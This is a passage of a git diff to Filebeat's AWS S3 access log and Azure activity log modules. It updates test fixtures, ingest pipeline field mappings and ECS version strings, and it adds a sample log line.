"http.request.method": "GET", + "http.response.body.bytes": 142, "http.response.status_code": 200, + "http.version": "1.1", "input.type": "log", "log.offset": 715, "related.ip": [ @@ -117,6 +136,9 @@ "tls.cipher": "ECDHE-RSA-AES128-SHA", "tls.version": "1.2", "tls.version_protocol": "tls", + "url.original": "/test-s3-ks/?location&aws-account=627959692251", + "url.path": "/test-s3-ks/", + "url.query": "location&aws-account=627959692251", "user_agent.device.name": "Other", "user_agent.name": "aws-sdk-java", "user_agent.original": "AWS-Support-TrustedAdvisor, aws-internal/3 aws-sdk-java/1.11.590 Linux/4.9.137-0.1.ac.218.74.329.metal1.x86_64 OpenJDK_64-Bit_Server_VM/25.212-b03 java/1.8.0_212 vendor/Oracle_Corporation", @@ -150,12 +172,17 @@ "client.user.id": "arn:aws:sts::123456:assumed-role/AWSServiceRoleForTrustedAdvisor/TrustedAdvisor_627959692251_784ab70b-8cc9-4d37-a2ec-2ff4d0c08af9", "cloud.provider": "aws", "event.action": "REST.GET.BUCKET", + "event.category": "web", "event.dataset": "aws.s3access", - "event.duration": "2", + "event.duration": 2000000, "event.id": "4DD6D17D1C5C401C", "event.kind": "event", "event.module": "aws", + "event.original": "36c1f05b76016b78528454e6e0c60e2b7ff7aa20c0a5e4c748276e5b0a2debd2 test-s3-ks [01/Aug/2019:00:24:43 +0000] 72.21.217.31 arn:aws:sts::123456:assumed-role/AWSServiceRoleForTrustedAdvisor/TrustedAdvisor_627959692251_784ab70b-8cc9-4d37-a2ec-2ff4d0c08af9 4DD6D17D1C5C401C REST.GET.BUCKET - \"GET /test-s3-ks/?max-keys=0&encoding-type=url&aws-account=627959692251 HTTP/1.1\" 200 - 265 - 2 1 \"-\" \"AWS-Support-TrustedAdvisor, aws-internal/3 aws-sdk-java/1.11.590 Linux/4.9.137-0.1.ac.218.74.329.metal1.x86_64 OpenJDK_64-Bit_Server_VM/25.212-b03 java/1.8.0_212 vendor/Oracle_Corporation\" - KzvchfojYQnuFC4PABYVJVxIlv/f6r17LRaTSvw7x+bxj4PkkPKT1kX9x8wbqtq40iD4PC881iE= SigV4 ECDHE-RSA-AES128-SHA AuthHeader s3.ap-southeast-1.amazonaws.com TLSv1.2", "event.outcome": "success", + "event.type": [ + "access" + ], "fileset.name": "s3access", "geo.city_name": "Ashburn", "geo.continent_name": "North America", @@ -165,7 +192,10 @@ "geo.location.lon": -77.4728, "geo.region_iso_code": "US-VA", "geo.region_name": "Virginia", + "http.request.method": "GET", + "http.response.body.bytes": 265, "http.response.status_code": 200, + "http.version": "1.1", "input.type": "log", "log.offset": 1429, "related.ip": [ @@ -181,6 +211,9 @@ "tls.cipher": "ECDHE-RSA-AES128-SHA", "tls.version": "1.2", "tls.version_protocol": "tls", + "url.original": "/test-s3-ks/?max-keys=0&encoding-type=url&aws-account=627959692251", + "url.path": "/test-s3-ks/", + "url.query": "max-keys=0&encoding-type=url&aws-account=627959692251", "user_agent.device.name": "Other", "user_agent.name": "aws-sdk-java", "user_agent.original": "AWS-Support-TrustedAdvisor, aws-internal/3 aws-sdk-java/1.11.590 Linux/4.9.137-0.1.ac.218.74.329.metal1.x86_64 OpenJDK_64-Bit_Server_VM/25.212-b03 java/1.8.0_212 vendor/Oracle_Corporation", @@ -213,12 +246,17 @@ "client.user.id": "arn:aws:sts::123456:assumed-role/AWSServiceRoleForTrustedAdvisor/TrustedAdvisor_627959692251_784ab70b-8cc9-4d37-a2ec-2ff4d0c08af9", "cloud.provider": "aws", "event.action": "REST.GET.LOCATION", + "event.category": "web", "event.dataset": "aws.s3access", - "event.duration": "4", + "event.duration": 4000000, "event.id": "706992E2F3CC3C3D", "event.kind": "event", "event.module": "aws", + "event.original": "36c1f05b76016b78528454e6e0c60e2b7ff7aa20c0a5e4c748276e5b0a2debd2 test-s3-ks [01/Aug/2019:00:24:43 +0000] 72.21.217.31 arn:aws:sts::123456:assumed-role/AWSServiceRoleForTrustedAdvisor/TrustedAdvisor_627959692251_784ab70b-8cc9-4d37-a2ec-2ff4d0c08af9 706992E2F3CC3C3D REST.GET.LOCATION - \"GET /test-s3-ks/?location&aws-account=627959692251 HTTP/1.1\" 200 - 142 - 4 - \"-\" \"AWS-Support-TrustedAdvisor, aws-internal/3 aws-sdk-java/1.11.590 Linux/4.9.137-0.1.ac.218.74.329.metal1.x86_64 OpenJDK_64-Bit_Server_VM/25.212-b03 java/1.8.0_212 vendor/Oracle_Corporation\" - cIN12KTrJwx+uTBZD+opZUPE4iGypi8oG/oXGPzFk9CMuHQGuEpmAeNELdtYKDxf2TDor25Nikg= SigV4 ECDHE-RSA-AES128-SHA AuthHeader s3.ap-southeast-1.amazonaws.com TLSv1.2", "event.outcome": "success", + "event.type": [ + "access" + ], "fileset.name": "s3access", "geo.city_name": "Ashburn", "geo.continent_name": "North America", @@ -228,7 +266,10 @@ "geo.location.lon": -77.4728, "geo.region_iso_code": "US-VA", "geo.region_name": "Virginia", + "http.request.method": "GET", + "http.response.body.bytes": 142, "http.response.status_code": 200, + "http.version": "1.1", "input.type": "log", "log.offset": 2161, "related.ip": [ @@ -244,6 +285,9 @@ "tls.cipher": "ECDHE-RSA-AES128-SHA", "tls.version": "1.2", "tls.version_protocol": "tls", + "url.original": "/test-s3-ks/?location&aws-account=627959692251", + "url.path": "/test-s3-ks/", + "url.query": "location&aws-account=627959692251", "user_agent.device.name": "Other", "user_agent.name": "aws-sdk-java", "user_agent.original": "AWS-Support-TrustedAdvisor, aws-internal/3 aws-sdk-java/1.11.590 Linux/4.9.137-0.1.ac.218.74.329.metal1.x86_64 OpenJDK_64-Bit_Server_VM/25.212-b03 java/1.8.0_212 vendor/Oracle_Corporation", @@ -274,11 +318,16 @@ "client.user.id": "arn:aws:iam::123456:user/test@elastic.co", "cloud.provider": "aws", "event.action": "BATCH.DELETE.OBJECT", + "event.category": "web", "event.dataset": "aws.s3access", "event.id": "8CD7A4A71E2E5C9E", "event.kind": "event", "event.module": "aws", + "event.original": "36c1f05b76016b78528454e6e0c60e2b7ff7aa20c0a5e4c748276e5b0a2debd2 jsoriano-s3-test [10/Sep/2019:15:11:07 +0000] 77.227.156.41 arn:aws:iam::123456:user/test@elastic.co 8CD7A4A71E2E5C9E BATCH.DELETE.OBJECT jolokia-war-1.5.0.war - 204 - - 344017 - - - - - IeDW5I3wefFxU8iHOcAzi5qr+O+1bdRlcQ0AO2WGjFh7JwYM6qCoKq+1TrUshrXMlBxPFtg97Vk= SigV4 ECDHE-RSA-AES128-SHA AuthHeader s3.eu-central-1.amazonaws.com TLSv1.2", "event.outcome": "success", + "event.type": [ + "access" + ], "fileset.name": "s3access", "geo.city_name": "Teruel", "geo.continent_name": "Europe", @@ -327,11 +376,16 @@ "client.user.id": "arn:aws:iam::123456:user/test@elastic.co", "cloud.provider": "aws", "event.action": "BATCH.DELETE.OBJECT", + "event.category": "web", "event.dataset": "aws.s3access", "event.id": "6CE38F1312D32BDD", "event.kind": "event", "event.module": "aws", + "event.original": "36c1f05b76016b78528454e6e0c60e2b7ff7aa20c0a5e4c748276e5b0a2debd2 test-s3-ks [19/Sep/2019:17:06:39 +0000] 174.29.206.152 arn:aws:iam::123456:user/test@elastic.co 6CE38F1312D32BDD BATCH.DELETE.OBJECT Screen+Shot+2019-09-09+at+9.08.44+AM.png - 204 - - 57138 - - - - - LwRa4w6DbuU48GKQiH3jDbjfTyLCbwasFBsdttugRQ+9lH4jK8lT91+HhGZKMYI3sPyKuQ9LvU0= SigV4 ECDHE-RSA-AES128-SHA AuthHeader s3-ap-southeast-1.amazonaws.com TLSv1.2", "event.outcome": "success", + "event.type": [ + "access" + ], "fileset.name": "s3access", "geo.city_name": "Denver", "geo.continent_name": "North America", diff --git a/x-pack/filebeat/module/aws/s3access/test/test.log b/x-pack/filebeat/module/aws/s3access/test/test.log index abb17ce2b453..8e3d2c0aff1c 100644 --- a/x-pack/filebeat/module/aws/s3access/test/test.log +++ b/x-pack/filebeat/module/aws/s3access/test/test.log @@ -3,3 +3,4 @@ 79a59df900b949e55d96a1e698fbacedfd6e09d98eacf8f8d5218e7cd47ef2be awsexamplebucket [06/Feb/2019:00:00:38 +0000] 192.0.2.3 79a59df900b949e55d96a1e698fbacedfd6e09d98eacf8f8d5218e7cd47ef2be A1206F460EXAMPLE REST.GET.BUCKETPOLICY - "GET /awsexamplebucket?policy HTTP/1.1" 404 NoSuchBucketPolicy 297 - 38 - "-" "S3Console/0.4" - BNaBsXZQQDbssi6xMBdBU2sLt+Yf5kZDmeBUP35sFoKa3sLLeMC78iwEIWxs99CRUrbS4n11234= SigV2 ECDHE-RSA-AES128-GCM-SHA256 AuthHeader awsexamplebucket.s3.amazonaws.com TLSV1.1 79a59df900b949e55d96a1e698fbacedfd6e09d98eacf8f8d5218e7cd47ef2be awsexamplebucket [06/Feb/2019:00:01:00 +0000] 192.0.2.3 79a59df900b949e55d96a1e698fbacedfd6e09d98eacf8f8d5218e7cd47ef2be 7B4A0FABBEXAMPLE REST.GET.VERSIONING - "GET /awsexamplebucket?versioning HTTP/1.1" 200 - 113 - 33 - "-" "S3Console/0.4" - Ke1bUcazaN1jWuUlPJaxF64cQVpUEhoZKEG/hmy/gijN/I1DeWqDfFvnpybfEseEME/u7ME1234= SigV2 ECDHE-RSA-AES128-GCM-SHA256 AuthHeader awsexamplebucket.s3.amazonaws.com TLSV1.1 79a59df900b949e55d96a1e698fbacedfd6e09d98eacf8f8d5218e7cd47ef2be awsexamplebucket [06/Feb/2019:00:01:57 +0000] 192.0.2.3 79a59df900b949e55d96a1e698fbacedfd6e09d98eacf8f8d5218e7cd47ef2be DD6CC733AEXAMPLE REST.PUT.OBJECT s3-dg.pdf "PUT /awsexamplebucket/s3-dg.pdf HTTP/1.1" 200 - - 4406583 41754 28 "-" "S3Console/0.4" - 10S62Zv81kBW7BB6SX4XJ48o6kpcl6LPwEoizZQQxJd5qDSCTLX0TgS37kYUBKQW3+bPdrg1234= SigV4 ECDHE-RSA-AES128-SHA AuthHeader awsexamplebucket.s3.amazonaws.com TLSV1.1 +79a59df900b949e55d96a1e698fbacedfd6e09d98eacf8f8d5218e7cd47ef2be faketest [09/Feb/2021:14:48:42 +0200] 192.0.2.3 79a59df900b949e55d96a1e698fbacedfd6e09d98eacf8f8d5218e7cd47ef2be DD6CC733AEXAMPLE REST.OPTIONS.FAKE s3-dg.pdf "OPTIONS * HTTP/1.0" 200 - - 4406583 41754 28 "-" "S3Console/0.4" - 10S62Zv81kBW7BB6SX4XJ48o6kpcl6LPwEoizZQQxJd5qDSCTLX0TgS37kYUBKQW3+bPdrg1234= SigV4 ECDHE-RSA-AES128-SHA AuthHeader awsexamplebucket.s3.amazonaws.com TLSV1.1 diff --git a/x-pack/filebeat/module/aws/s3access/test/test.log-expected.json b/x-pack/filebeat/module/aws/s3access/test/test.log-expected.json index fb6c38fb1085..f6ca4d4edf36 100644 --- a/x-pack/filebeat/module/aws/s3access/test/test.log-expected.json +++ b/x-pack/filebeat/module/aws/s3access/test/test.log-expected.json @@ -23,14 +23,22 @@ "client.user.id": "79a59df900b949e55d96a1e698fbacedfd6e09d98eacf8f8d5218e7cd47ef2be", "cloud.provider": "aws", "event.action": "REST.GET.VERSIONING", + "event.category": "web", "event.dataset": "aws.s3access", - "event.duration": "7", + "event.duration": 7000000, "event.id": "3E57427F3EXAMPLE", "event.kind": "event", "event.module": "aws", + "event.original": "79a59df900b949e55d96a1e698fbacedfd6e09d98eacf8f8d5218e7cd47ef2be awsexamplebucket [06/Feb/2019:00:00:38 +0000] 192.0.2.3 79a59df900b949e55d96a1e698fbacedfd6e09d98eacf8f8d5218e7cd47ef2be 3E57427F3EXAMPLE REST.GET.VERSIONING - \"GET /awsexamplebucket?versioning HTTP/1.1\" 200 - 113 - 7 - \"-\" \"S3Console/0.4\" - s9lzHYrFp76ZVxRcpX9+5cjAnEH2ROuNkd2BHfIa6UkFVdtjf5mKR3/eTPFvsiP/XV/VLi31234= SigV2 ECDHE-RSA-AES128-GCM-SHA256 AuthHeader awsexamplebucket.s3.amazonaws.com TLSV1.1", "event.outcome": "success", + "event.type": [ + "access" + ], "fileset.name": "s3access", + "http.request.method": "GET", + "http.response.body.bytes": 113, "http.response.status_code": 200, + "http.version": "1.1", "input.type": "log", "log.offset": 0, "related.ip": [ @@ -46,6 +54,9 @@ "tls.cipher": "ECDHE-RSA-AES128-GCM-SHA256", "tls.version": "1.1", "tls.version_protocol": "tls", + "url.original": "/awsexamplebucket?versioning", + "url.path": "/awsexamplebucket", + "url.query": "versioning", "user_agent.device.name": "Other", "user_agent.name": "Other", "user_agent.original": "S3Console/0.4" @@ -74,14 +85,22 @@ "client.user.id": "79a59df900b949e55d96a1e698fbacedfd6e09d98eacf8f8d5218e7cd47ef2be", "cloud.provider": "aws", "event.action": "REST.GET.LOGGING_STATUS", + "event.category": "web", "event.dataset": "aws.s3access", - "event.duration": "11", + "event.duration": 11000000, "event.id": "891CE47D2EXAMPLE", "event.kind": "event", "event.module": "aws", + "event.original": "79a59df900b949e55d96a1e698fbacedfd6e09d98eacf8f8d5218e7cd47ef2be awsexamplebucket [06/Feb/2019:00:00:38 +0000] 192.0.2.3 79a59df900b949e55d96a1e698fbacedfd6e09d98eacf8f8d5218e7cd47ef2be 891CE47D2EXAMPLE REST.GET.LOGGING_STATUS - \"GET /awsexamplebucket?logging HTTP/1.1\" 200 - 242 - 11 - \"-\" \"S3Console/0.4\" - 9vKBE6vMhrNiWHZmb2L0mXOcqPGzQOI5XLnCtZNPxev+Hf+7tpT6sxDwDty4LHBUOZJG96N1234= SigV2 ECDHE-RSA-AES128-GCM-SHA256 AuthHeader awsexamplebucket.s3.amazonaws.com TLSV1.1", "event.outcome": "success", + "event.type": [ + "access" + ], "fileset.name": "s3access", + "http.request.method": "GET", + "http.response.body.bytes": 242, "http.response.status_code": 200, + "http.version": "1.1", "input.type": "log", "log.offset": 471, "related.ip": [ @@ -97,6 +116,9 @@ "tls.cipher": "ECDHE-RSA-AES128-GCM-SHA256", "tls.version": "1.1", "tls.version_protocol": "tls", + "url.original": "/awsexamplebucket?logging", + "url.path": "/awsexamplebucket", + "url.query": "logging", "user_agent.device.name": "Other", "user_agent.name": "Other", "user_agent.original": "S3Console/0.4" @@ -126,15 +148,23 @@ "client.user.id": "79a59df900b949e55d96a1e698fbacedfd6e09d98eacf8f8d5218e7cd47ef2be", "cloud.provider": "aws", "event.action": "REST.GET.BUCKETPOLICY", + "event.category": "web", "event.code": "NoSuchBucketPolicy", "event.dataset": "aws.s3access", - "event.duration": "38", + "event.duration": 38000000, "event.id": "A1206F460EXAMPLE", "event.kind": "event", "event.module": "aws", + "event.original": "79a59df900b949e55d96a1e698fbacedfd6e09d98eacf8f8d5218e7cd47ef2be awsexamplebucket [06/Feb/2019:00:00:38 +0000] 192.0.2.3 79a59df900b949e55d96a1e698fbacedfd6e09d98eacf8f8d5218e7cd47ef2be A1206F460EXAMPLE REST.GET.BUCKETPOLICY - \"GET /awsexamplebucket?policy HTTP/1.1\" 404 NoSuchBucketPolicy 297 - 38 - \"-\" \"S3Console/0.4\" - BNaBsXZQQDbssi6xMBdBU2sLt+Yf5kZDmeBUP35sFoKa3sLLeMC78iwEIWxs99CRUrbS4n11234= SigV2 ECDHE-RSA-AES128-GCM-SHA256 AuthHeader awsexamplebucket.s3.amazonaws.com TLSV1.1", "event.outcome": "failure", + "event.type": [ + "access" + ], "fileset.name": "s3access", + "http.request.method": "GET", + "http.response.body.bytes": 297, "http.response.status_code": 404, + "http.version": "1.1", "input.type": "log", "log.offset": 944, "related.ip": [ @@ -150,6 +180,9 @@ "tls.cipher": "ECDHE-RSA-AES128-GCM-SHA256", "tls.version": "1.1", "tls.version_protocol": "tls", + "url.original": "/awsexamplebucket?policy", + "url.path": "/awsexamplebucket", + "url.query": "policy", "user_agent.device.name": "Other", "user_agent.name": "Other", "user_agent.original": "S3Console/0.4" @@ -178,14 +211,22 @@ "client.user.id": "79a59df900b949e55d96a1e698fbacedfd6e09d98eacf8f8d5218e7cd47ef2be", "cloud.provider": "aws", "event.action": "REST.GET.VERSIONING", + "event.category": "web", "event.dataset": "aws.s3access", - "event.duration": "33", + "event.duration": 33000000, "event.id": "7B4A0FABBEXAMPLE", "event.kind": "event", "event.module": "aws", + "event.original": "79a59df900b949e55d96a1e698fbacedfd6e09d98eacf8f8d5218e7cd47ef2be awsexamplebucket [06/Feb/2019:00:01:00 +0000] 192.0.2.3 79a59df900b949e55d96a1e698fbacedfd6e09d98eacf8f8d5218e7cd47ef2be 7B4A0FABBEXAMPLE REST.GET.VERSIONING - \"GET /awsexamplebucket?versioning HTTP/1.1\" 200 - 113 - 33 - \"-\" \"S3Console/0.4\" - Ke1bUcazaN1jWuUlPJaxF64cQVpUEhoZKEG/hmy/gijN/I1DeWqDfFvnpybfEseEME/u7ME1234= SigV2 ECDHE-RSA-AES128-GCM-SHA256 AuthHeader awsexamplebucket.s3.amazonaws.com TLSV1.1", "event.outcome": "success", + "event.type": [ + "access" + ], "fileset.name": "s3access", + "http.request.method": "GET", + "http.response.body.bytes": 113, "http.response.status_code": 200, + "http.version": "1.1", "input.type": "log", "log.offset": 1431, "related.ip": [ @@ -201,6 +242,9 @@ "tls.cipher": "ECDHE-RSA-AES128-GCM-SHA256", "tls.version": "1.1", "tls.version_protocol": "tls", + "url.original": "/awsexamplebucket?versioning", + "url.path": "/awsexamplebucket", + "url.query": "versioning", "user_agent.device.name": "Other", "user_agent.name": "Other", "user_agent.original": "S3Console/0.4" @@ -231,14 +275,21 @@ "client.user.id": "79a59df900b949e55d96a1e698fbacedfd6e09d98eacf8f8d5218e7cd47ef2be", "cloud.provider": "aws", "event.action": "REST.PUT.OBJECT", + "event.category": "web", "event.dataset": "aws.s3access", - "event.duration": "41754", + "event.duration": 41754000000, "event.id": "DD6CC733AEXAMPLE", "event.kind": "event", "event.module": "aws", + "event.original": "79a59df900b949e55d96a1e698fbacedfd6e09d98eacf8f8d5218e7cd47ef2be awsexamplebucket [06/Feb/2019:00:01:57 +0000] 192.0.2.3 79a59df900b949e55d96a1e698fbacedfd6e09d98eacf8f8d5218e7cd47ef2be DD6CC733AEXAMPLE REST.PUT.OBJECT s3-dg.pdf \"PUT /awsexamplebucket/s3-dg.pdf HTTP/1.1\" 200 - - 4406583 41754 28 \"-\" \"S3Console/0.4\" - 10S62Zv81kBW7BB6SX4XJ48o6kpcl6LPwEoizZQQxJd5qDSCTLX0TgS37kYUBKQW3+bPdrg1234= SigV4 ECDHE-RSA-AES128-SHA AuthHeader awsexamplebucket.s3.amazonaws.com TLSV1.1", "event.outcome": "success", + "event.type": [ + "access" + ], "fileset.name": "s3access", + "http.request.method": "PUT", "http.response.status_code": 200, + "http.version": "1.1", "input.type": "log", "log.offset": 1903, "related.ip": [ @@ -254,6 +305,69 @@ "tls.cipher": "ECDHE-RSA-AES128-SHA", "tls.version": "1.1", "tls.version_protocol": "tls", + "url.original": "/awsexamplebucket/s3-dg.pdf", + "url.path": "/awsexamplebucket/s3-dg.pdf", + "user_agent.device.name": "Other", + "user_agent.name": "Other", + "user_agent.original": "S3Console/0.4" + }, + { + "@timestamp": "2021-02-09T12:48:42.000Z", + "aws.s3access.authentication_type": "AuthHeader", + "aws.s3access.bucket": "faketest", + "aws.s3access.bucket_owner": "79a59df900b949e55d96a1e698fbacedfd6e09d98eacf8f8d5218e7cd47ef2be", + "aws.s3access.cipher_suite": "ECDHE-RSA-AES128-SHA", + "aws.s3access.host_header": "awsexamplebucket.s3.amazonaws.com", + "aws.s3access.host_id": "10S62Zv81kBW7BB6SX4XJ48o6kpcl6LPwEoizZQQxJd5qDSCTLX0TgS37kYUBKQW3+bPdrg1234=", + "aws.s3access.http_status": 200, + "aws.s3access.key": "s3-dg.pdf", + "aws.s3access.object_size": 4406583, + "aws.s3access.operation": "REST.OPTIONS.FAKE", + "aws.s3access.remote_ip": "192.0.2.3", + "aws.s3access.request_id": "DD6CC733AEXAMPLE", + "aws.s3access.request_uri": "OPTIONS * HTTP/1.0", + "aws.s3access.requester": "79a59df900b949e55d96a1e698fbacedfd6e09d98eacf8f8d5218e7cd47ef2be", + "aws.s3access.signature_version": "SigV4", + "aws.s3access.tls_version": "TLSV1.1", + "aws.s3access.total_time": 41754, + "aws.s3access.turn_around_time": 28, + "aws.s3access.user_agent": "S3Console/0.4", + "client.address": "192.0.2.3", + "client.ip": "192.0.2.3", + "client.user.id": "79a59df900b949e55d96a1e698fbacedfd6e09d98eacf8f8d5218e7cd47ef2be", + "cloud.provider": "aws", + "event.action": "REST.OPTIONS.FAKE", + "event.category": "web", + "event.dataset": "aws.s3access", + "event.duration": 41754000000, + "event.id": "DD6CC733AEXAMPLE", + "event.kind": "event", + "event.module": "aws", + "event.original": "79a59df900b949e55d96a1e698fbacedfd6e09d98eacf8f8d5218e7cd47ef2be faketest [09/Feb/2021:14:48:42 +0200] 192.0.2.3 79a59df900b949e55d96a1e698fbacedfd6e09d98eacf8f8d5218e7cd47ef2be DD6CC733AEXAMPLE REST.OPTIONS.FAKE s3-dg.pdf \"OPTIONS * HTTP/1.0\" 200 - - 4406583 41754 28 \"-\" \"S3Console/0.4\" - 10S62Zv81kBW7BB6SX4XJ48o6kpcl6LPwEoizZQQxJd5qDSCTLX0TgS37kYUBKQW3+bPdrg1234= SigV4 ECDHE-RSA-AES128-SHA AuthHeader awsexamplebucket.s3.amazonaws.com TLSV1.1", + "event.outcome": "success", + "event.type": [ + "access" + ], + "fileset.name": "s3access", + "http.request.method": "OPTIONS", + "http.response.status_code": 200, + "http.version": "1.0", + "input.type": "log", + "log.offset": 2379, + "related.ip": [ + "192.0.2.3" + ], + "related.user": [ + "79a59df900b949e55d96a1e698fbacedfd6e09d98eacf8f8d5218e7cd47ef2be" + ], + "service.type": "aws", + "tags": [ + "forwarded" + ], + "tls.cipher": "ECDHE-RSA-AES128-SHA", + "tls.version": "1.1", + "tls.version_protocol": "tls", + "url.original": "*", "user_agent.device.name": "Other", "user_agent.name": "Other", "user_agent.original": "S3Console/0.4" diff --git a/x-pack/filebeat/module/aws/vpcflow/config/input.yml b/x-pack/filebeat/module/aws/vpcflow/config/input.yml index 1752158d25e6..1f1e085c0829 100644 --- a/x-pack/filebeat/module/aws/vpcflow/config/input.yml +++ b/x-pack/filebeat/module/aws/vpcflow/config/input.yml @@ -181,4 +181,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/azure/activitylogs/config/azure-eventhub.yml b/x-pack/filebeat/module/azure/activitylogs/config/azure-eventhub.yml index 29e6d770780c..8701cae46fb7 100644 --- a/x-pack/filebeat/module/azure/activitylogs/config/azure-eventhub.yml +++ b/x-pack/filebeat/module/azure/activitylogs/config/azure-eventhub.yml @@ -13,4 +13,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/azure/activitylogs/config/file.yml b/x-pack/filebeat/module/azure/activitylogs/config/file.yml index 402a1b25b125..4242dc4cd7b2 100644 --- a/x-pack/filebeat/module/azure/activitylogs/config/file.yml +++ b/x-pack/filebeat/module/azure/activitylogs/config/file.yml @@ -11,4 +11,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/x-pack/filebeat/module/azure/activitylogs/ingest/pipeline.yml b/x-pack/filebeat/module/azure/activitylogs/ingest/pipeline.yml index a7a581db2b28..d9621f0694fc 100644 --- a/x-pack/filebeat/module/azure/activitylogs/ingest/pipeline.yml +++ b/x-pack/filebeat/module/azure/activitylogs/ingest/pipeline.yml @@ -21,10 +21,11 @@ processors: ignore_failure: true formats: - ISO8601 +- rename: + field: message + target_field: event.original - remove: - field: - - message - - azure.activitylogs.time + field: azure.activitylogs.time ignore_missing: true - rename: field: azure.activitylogs.resourceId @@ -34,6 +35,15 @@ processors: field: azure.activitylogs.callerIpAddress target_field: source.ip ignore_missing: true +- set: + field: client.ip + value: '{{source.ip}}' + ignore_empty_value: true +- append: + field: related.ip + value: '{{source.ip}}' + allow_duplicates: false + if: 'ctx.source?.ip != null' - rename: field: azure.activitylogs.level target_field: log.level @@ -223,6 +233,26 @@ processors: patterns: - '%{USERNAME:user.name}@%{HOSTNAME:user.domain}' ignore_missing: true + ignore_failure: true + +# set user.email to the original name if the above grok succeeded. +- set: + field: user.email + value: '{{azure.activitylogs.identity.claims_initiated_by_user.name}}' + ignore_empty_value: true + if: 'ctx.user?.name != null' + +# set user.name to the original name if the above grok failed (name format is not an email). +- set: + field: user.name + value: '{{azure.activitylogs.identity.claims_initiated_by_user.name}}' + ignore_empty_value: true + if: 'ctx.user?.name == null' +- append: + field: related.user + value: '{{user.name}}' + allow_duplicates: false + if: 'ctx.user?.name != null' - convert: field: azure.activitylogs.identity.claims_initiated_by_user.fullname target_field: user.full_name diff --git a/x-pack/filebeat/module/azure/activitylogs/test/activitylogs.log-expected.json b/x-pack/filebeat/module/azure/activitylogs/test/activitylogs.log-expected.json index 3f86faee0840..245269fbfb6d 100644 --- a/x-pack/filebeat/module/azure/activitylogs/test/activitylogs.log-expected.json +++ b/x-pack/filebeat/module/azure/activitylogs/test/activitylogs.log-expected.json @@ -35,12 +35,14 @@ "azure.resource.namespace": "AZURELSEVENTS", "azure.resource.provider": "MICROSOFT.EVENTHUB", "azure.subscription_id": "8a4de8b5-095c-47d0-a96f-a75130c61d53", + "client.ip": "51.251.141.41", "cloud.provider": "azure", "event.action": "MICROSOFT.EVENTHUB/NAMESPACES/AUTHORIZATIONRULES/LISTKEYS/ACTION", "event.dataset": "azure.activitylogs", "event.duration": 0, "event.kind": "event", "event.module": "azure", + "event.original": "{\"callerIpAddress\":\"51.251.141.41\",\"category\":\"Action\",\"correlationId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"durationMs\":0,\"identity\":{\"authorization\":{\"action\":\"Microsoft.EventHub/namespaces/authorizationRules/listKeys/action\",\"evidence\":{\"principalId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"principalType\":\"ServicePrincipal\",\"role\":\"Azure EventGrid Service BuiltIn Role\",\"roleAssignmentId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"roleAssignmentScope\":\"/subscriptions/8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"roleDefinitionId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\"},\"scope\":\"/subscriptions/8a4de8b5-095c-47d0-a96f-a75130c61d53/resourceGroups/sa-hem/providers/Microsoft.EventHub/namespaces/azurelsevents/authorizationRules/RootManageSharedAccessKey\"},\"claims\":{\"aio\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"appid\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"appidacr\":\"2\",\"aud\":\"https://management.core.windows.net/\",\"exp\":\"1571904826\",\"http://schemas.microsoft.com/identity/claims/identityprovider\":\"https://sts.windows.net/8a4de8b5-095c-47d0-a96f-a75130c61d53/\",\"http://schemas.microsoft.com/identity/claims/objectidentifier\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"http://schemas.microsoft.com/identity/claims/tenantid\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"iat\":\"1571875726\",\"iss\":\"https://sts.windows.net/8a4de8b5-095c-47d0-a96f-a75130c61d53/\",\"nbf\":\"1571875726\",\"uti\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"ver\":\"1.0\"}},\"level\":\"Information\",\"location\":\"global\",\"operationName\":\"MICROSOFT.EVENTHUB/NAMESPACES/AUTHORIZATIONRULES/LISTKEYS/ACTION\",\"resourceId\":\"/SUBSCRIPTIONS/8a4de8b5-095c-47d0-a96f-a75130c61d53/RESOURCEGROUPS/SA-HEMA/PROVIDERS/MICROSOFT.EVENTHUB/NAMESPACES/AZURELSEVENTS/AUTHORIZATIONRULES/ROOTMANAGESHAREDACCESSKEY\",\"resultSignature\":\"Started.\",\"resultType\":\"Start\",\"time\":\"2019-10-24T00:13:46.3554259Z\"}", "event.type": [ "change" ], @@ -53,6 +55,9 @@ "input.type": "log", "log.level": "Information", "log.offset": 0, + "related.ip": [ + "51.251.141.41" + ], "service.type": "azure", "source.geo.continent_name": "Europe", "source.geo.country_iso_code": "GB", diff --git a/x-pack/filebeat/module/azure/activitylogs/test/supporttickets_write.log-expected.json b/x-pack/filebeat/module/azure/activitylogs/test/supporttickets_write.log-expected.json index 5f14108e4c4f..28c9ca7cd009 100644 --- a/x-pack/filebeat/module/azure/activitylogs/test/supporttickets_write.log-expected.json +++ b/x-pack/filebeat/module/azure/activitylogs/test/supporttickets_write.log-expected.json @@ -39,12 +39,14 @@ "azure.correlation_id": "c776f9f4-36e5-4e0e-809b-c9b3c3fb62a8", "azure.resource.id": "/subscriptions/s1/resourceGroups/MSSupportGroup/providers/microsoft.support/supporttickets/115012112305841", "azure.resource.provider": "microsoft.support/supporttickets/115012112305841", + "client.ip": "111.111.111.11", "cloud.provider": "azure", "event.action": "microsoft.support/supporttickets/write", "event.dataset": "azure.activitylogs", "event.duration": -1468967296, "event.kind": "event", "event.module": "azure", + "event.original": 